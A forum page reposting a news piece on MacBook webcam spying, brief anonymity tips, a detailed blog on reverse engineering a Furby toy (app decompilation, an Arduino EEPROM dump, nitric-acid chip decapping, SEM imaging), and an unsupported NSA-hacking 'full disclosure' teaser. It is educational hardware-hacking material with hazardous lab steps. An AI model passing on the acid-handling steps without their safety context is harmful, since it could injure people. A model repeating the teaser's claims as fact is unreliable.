Brocker and Checkoway write in their report that they contacted the company on July 16. “Apple employees followed up several times but did not inform us of any possible mitigation plans,” the researchers write. RATted out The software used by Abrahams in the Wolf case is known as a Remote Administration Tool, or RAT. This software, which allows someone to control a computer from across the Internet, has legitimate purposes as well as nefarious ones. For example, it can make it easier for a school’s IT staff to administer a classroom full of computers. Indeed, the devices the researchers studied were similar to MacBooks involved in a notorious case in Pennsylvania in 2008. In that incident, administrators at Lower Merion High School outside Philadelphia reportedly captured 56,000 images of students using the RAT installed on school-issued laptops. Students reported seeing a ‘creepy’ green flicker that indicated that the camera was in use. That helped to alert students to the issue, eventually leading to a lawsuit. But more sophisticated remote monitoring tools may already have the capabilities to suppress the warning light, says Morgan Marquis-Boire, a security researcher at the University of Toronto. He says that cheap RATs like the one used in Merion High School may not have the ability to disable the hardware LEDs, but “you would probably expect more sophisticated surveillance offerings which cost hundreds of thousands of euros” to be stealthier. He points to commercial surveillance products such as Hacking Team and FinFisher that are marketed for use by governments. FinFisher is a suite of tools sold by a European firm called the Gamma Group. A company marketing document released by WikiLeaks indicated that Finfisher could be “covertly deployed on the Target Systems” and enable, among other things, “Live Surveillance through Webcam and Microphone.” The Chinese government has also been accused of using RATs for surveillance purposes. A 2009 report from the University of Toronto described a surveillance program called Ghostnet that the Chinese government allegedly used to spy on prominent Tibetans, including the Dalai Lama. The authors reported that “web cameras are being silently triggered, and audio inputs surreptitiously activated,” though it’s not clear whether the Ghostnet software is capable of disabling camera warning lights. Luckily, there’s an easy way for users to protect themselves. “The safest thing to do is to put a piece of tape on your camera,” Miller says. Ashkan Soltani is an independent security researcher and consultant. Sursa: Research shows how MacBook Webcams can spy on their users without warning
  22. Deci ca sugestii: 1. Disable Javascript (temporar) 2. Random user agent 3. Spoof MAC Altceva?
  23. Reverse Engineering a Furby Table of Contents Introduction About the Device Inter-Device Communication Reversing the Android App Reversing the Hardware Dumping the EEPROM Decapping Proprietary Chips SEM Imaging of Decapped Chips Introduction This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives. However, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby. About the Device A Furby is an evil robotic children’s toy wrapped in colored fur. Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli. Since its original debut in 1998, the Furby apparently received a number of upgrades and new features. The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app. Inter-Device Communication As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app. However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols. Instead, a look at the official Hasbro Furby FAQ told a more interesting story: Q. There is a high pitched tone coming from Furby and/or my iOS device. A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals. Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies. That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone. #badBIOS anyone? This was easily confirmed by use of the mobile app which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby. The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app. Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol. Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby. Reversing the Android App Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding. After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits: $ unzip -q com.hasbro.furby.apk $ d2j-dex2jar.sh classes.dex dex2jar classes.dex -> classes-dex2jar.jar $ Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files. I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd(). Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class: private void sendComAirCmd(int paramInt){ Logger.log(Deli.TAG, "sent command: " + paramInt); Integer localInteger1 = Integer.valueOf(paramInt); int i = 0x1F & localInteger1.intValue() >> 5; int j = 32 + (0x1F & localInteger1.intValue()); ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2]; ComAirWrapper localComAirWrapper1 = this.comairWrapper; localComAirWrapper1.getClass(); arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F); ComAirWrapper localComAirWrapper2 = this.comairWrapper; localComAirWrapper2.getClass(); arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F); he name generalplus appears to identify the Taiwanese company General Plus, which “engage in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).” I was unable to find any public information about the GPLib/ComAir library. However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others. The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself. Continuing to dig, I found the file libGPLibComAir.so: $ file lib/armeabi/libGPLibComAir.so lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped Quick analysis on the binary showed that this was likely the code I had been looking for: $ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command0000787d T ComAir_GetCommand00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo000058cd T _Z13EncodeRegCodethPh00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag00004e05 T _ZN12C_ComAirCore6DecodeEPsi00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv0000547d T _ZN15C_ComAirEncoder11PlayCommandEi000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf00005369 T _ZN15C_ComAirEncoder4InitEv000051f9 T _ZN15C_ComAirEncoderC1Ev000050b9 T _ZN15C_ComAirEncoderC2Ev00005351 T _ZN15C_ComAirEncoderD1Ev00005339 T _ZN15C_ComAirEncoderD2Ev I loaded the binary in IDA Pro and quickly confirmed my thought. The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function: unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3){ int v3; // ST0C_4@1 int v4; // ST04_4@1 int v5; // ST1C_4@1 const void *v6; // ST18_4@1 unsigned int v7; // ST14_4@1 v3 = a1; v4 = a3; v5 = _JNIEnv::GetArrayLength(); v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0); v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5); _JNIEnv::ReleaseShortArrayElements(v3); return v7; } Within C_ComAirCore: DecodeBuffer() resided a looping call to ComAir_DecFrameProc() which appeared to be referencing some table of phase coefficients: int __fastcall ComAir_DecFrameProc(int a1, int a2){ int v2; // r5@1 signed int v3; // r4@1 int v4; // r0@3 int v5; // r3@5 signed int v6; // r2@5 v2 = a1; v3 = 0x40; if ( ComAir_Rate_Mode != 1 ) { v3 = 0x80; if ( ComAir_Rate_Mode == 2 ) v3 = 0x20; } v4 = (a2 << 0xC) / 0x64; if ( v4 > (signed int)&PHASE_COEF[0x157F] ) v4 = (int)&PHASE_COEF[0x157F]; v5 = v2; v6 = 0; do { ++v6; *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10; v5 += 2; } while ( v3 > v6 ); ComAirDec(); return ComAir_GetCommand(); } Near the end of the function was a call to the very large function ComAirDec(), which likely was decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process. Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced. Itching to continue onto reverse engineering the hardware, I began disassembling the device. Reversing the Hardware Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and number of hidden screws. Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device. The heart of the Furby lies in the following two-piece circuit board: Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version. Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded as Shenzen LIZE on the U.S. version, the French version was branded ATMEL: The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy. This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro. This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings. However, one may still simply inspect the traces connected to the chip and infer its functionality from there. For now, let’s start with something more accessible and dump the exposed EEPROM. Dumping the EEPROM The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings: By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption. The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzen LIZE. Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board. Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air. Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually. I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development. Referencing the datasheet, we find that there are eight total pins to deal with. Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with. By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip. Since we only have one EEPROM, we can simply tie all three to ground. Likewise, pin 4 (GND) is also connected to ground. Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines. SDA provides bi-directional serial data transfer, while SCL provides a clock signal. Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode. Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts). Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it. Pin 8 (VCC) is also connected to the same positive power source. After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip: #include <Wire.h>#define disk1 0x50 // Address of eeprom chip byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) { byte rdata = 0x11; Wire.beginTransmission(deviceaddress); // Wire.write((int)(eeaddress >> 8)); // MSB Wire.write((int)(eeaddress & 0xFF)); // LSB Wire.endTransmission(); Wire.requestFrom(deviceaddress,1); if (Wire.available()) rdata = Wire.read(); return rdata; } void setup(void) { Serial.begin(9600); Wire.begin(); unsigned int i, j; unsigned char b; for ( i = 0; i < 16; i++ ) { for ( j = 0; j < 16; j++ ) { b = i2c_eeprom_read_byte(disk1, (i * 16) + j); if ( (b & 0xf0) == 0 ) Serial.print("0"); Serial.print(b, HEX); Serial.print(" "); } Serial.println(); } } void loop(){} Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out. Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence using a single byte. Larger memory capacities require use of larger address spaces (9 bits, 10 bits, so on) which require two bytes to accompany all necessary address bits. Upon running the sketch, we are presented with the following output: 2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18 0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data. By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes. Decapping Proprietary Chips With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy. Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself. Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself. Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner. First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of sheers and cut around it. Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed. The entire experiment took place in a fume hood which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in. Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size. Since I was working with a lower concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1-3 hours. “Medium” (left) and “Tiny” (right) After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper. After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times. The large chip took the longest to finish simply due to the size of the attached circuit board fragment. About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed. At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact: About thirty minutes later and with the addition of more nitric acid, all three samples were cleaned and ready for imaging: SEM Imaging of Decapped Chips The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings. Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM) with great thanks to Dr. William Fowle. Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate. A few initial experimental SEM images were taken; however a number of artifacts were present that severely affected the image quality. To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons. Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface. After treatment, the samples were placed back in the SEM and imaged with greater success. Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture. The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification: Unfortunately, as can be seen in the image above, the medium chip did not appear to have cleaned completely in its nitric acid bath. Although it is believed to be a memory storage device of some sort (by looking at optical images), it is impossible to discern any finer details from the SEM image. A number of interesting features were found during the imaging process. The marking “GHG554? may be clearly seen directly west on the small chip. Additionally, in similar font face, the marking “GFI392? may be seen on the south-east corner of the large chip: Higher zoom images were also taken of generally interesting topology on the chips. For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips: If you are familiar with of these chips or any their features, feedback would be greatly appreciated. EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads. Additional images taken throughout this project are available at: Flickr: mncoppola's Photostream Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project: Prof. Wil Robertson – College of Computer and Information Science @ NEU Dr. Geoffrey Davies – Dept. of Chemistry & Chemical Biology @ NEU Dr. William Fowle – Nanomaterials Instrumentation Facility @ NEU Molly White Kaylie DeHart Sursa: Reverse Engineering a Furby | Michael Coppola's Blog
  24. Full Disclosure The Internet Dark Age • Removing Governments on-line stranglehold • Disabling NSA/GCHQ major capabilities (BULLRUN / EDGEHILL) • Restoring on-line privacy - immediately by The Adversaries Update 1 - Spread the Word Uncovered – //NONSA//NOGCHQ//NOGOV - CC BY-ND On September 5th 2013, Bruce Schneier, wrote in The Guardian: “The NSA also attacks network devices directly: routers, switches, firewalls, etc. Most of these devices have surveillance capabilities already built in; the trick is to surreptitiously turn them on. This is an especially fruitful avenue of attack; routers are updated less frequently, tend not to have security software installed on them, and are generally ignored as a vulnerability”. “The NSA also devotes considerable resources to attacking endpoint computers. This kind of thing is done by its TAO – Tailored Access Operations – group. TAO has a menu of exploits it can serve up against your computer – whether you're running Windows, Mac OS, Linux, iOS, or something else – and a variety of tricks to get them on to your computer. Your anti-virus software won't detect them, and you'd have trouble finding them even if you knew where to look. These are hacker tools designed by hackers with an essentially unlimited budget. What I took away from reading the Snowden documents was that if the NSA wants in to your computer, it's in. Period”. http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-securesurveillance The evidence provided by this Full-Disclosure is the first independent technical verifiable proof that Bruce Schneier's statements are indeed correct. We explain how NSA/GCHQ: • Are Internet wiretapping you • Break into your home network • Perform 'Tailored Access Operations' (TAO) in your home • Steal your encryption keys • Can secretly plant anything they like on your computer • Can secretly steal anything they like from your computer • How to STOP this Computer Network Exploitation Download: http://cryptome.org/2013/12/Full-Disclosure.pdf
×
×
  • Create New...